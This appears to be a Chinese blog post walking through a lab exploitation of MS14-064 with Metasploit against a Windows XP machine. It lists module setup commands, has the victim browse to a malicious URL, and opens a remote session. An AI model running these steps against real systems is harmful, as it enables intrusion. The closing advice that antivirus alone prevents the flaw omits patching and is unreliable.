网络安全渗透实战详细详解

第一篇在此平台发布实战内容,有多处不足请多指教,本次内容详解ms14-064漏洞利用与加固。

任务环境说明:

渗透机:Kali Linux

靶机:Microsoft Windows XP

渗透机IP:172.16.7.122

靶机IP:172.16.7.120

实验步骤实战

1.打开网络拓扑  进入msfconsole渗透测试平台

网络安全渗透实战详细详解_第1张图片

2.输入命令 search ms14-064 搜索模块,并用use 调节 输入此下面红色模块

网络安全渗透实战详细详解_第2张图片

3.输入 show options查看配置所需的参数

网络安全渗透实战详细详解_第3张图片

4.输入 set SRVHOST命令来设置本地监听的地址   注:SRVHOST监听 kali是不区分大小写的

 

5.输入 set SRVORT 设置本地监听端口

6.输入 set URIPATH 来设置所利用的网站路径

7.输入 set payload +攻击模块 来设置攻击

8.输入 set LHOST 来设置攻击机IP地址

9.输入set options最后重新查看所设置的参数 都设置完毕了没有

网络安全渗透实战详细详解_第4张图片

10.最后输入攻击命令 run或exploit来进行漏洞模块攻击

网络安全渗透实战详细详解_第5张图片 11. run成功后已生成URL,本测试生成URL为:http://172.16.7.122:8080/

下面我们转到Windows XP这里  用ie浏览器输入已生成的URL 回车即可

 网络安全渗透实战详细详解_第6张图片

12.我们重新切换到攻击机这里, 已经入侵成功了 我们随便输入几个命令来看一下,输入 dir 来显示当前目录内容

 

13.输入 sessions -i来查看当前活跃会话

网络安全渗透实战详细详解_第7张图片

 好了这是ms14-064的漏洞渗透实验,预防此漏洞 在系统中安装杀毒软件来加固自己的操作系统即可

本次实验结束,此文章经供参考,大家切勿利用做违法法律行为, 安全合理上网。

你可能感兴趣的:(渗透,web安全,安全,网络)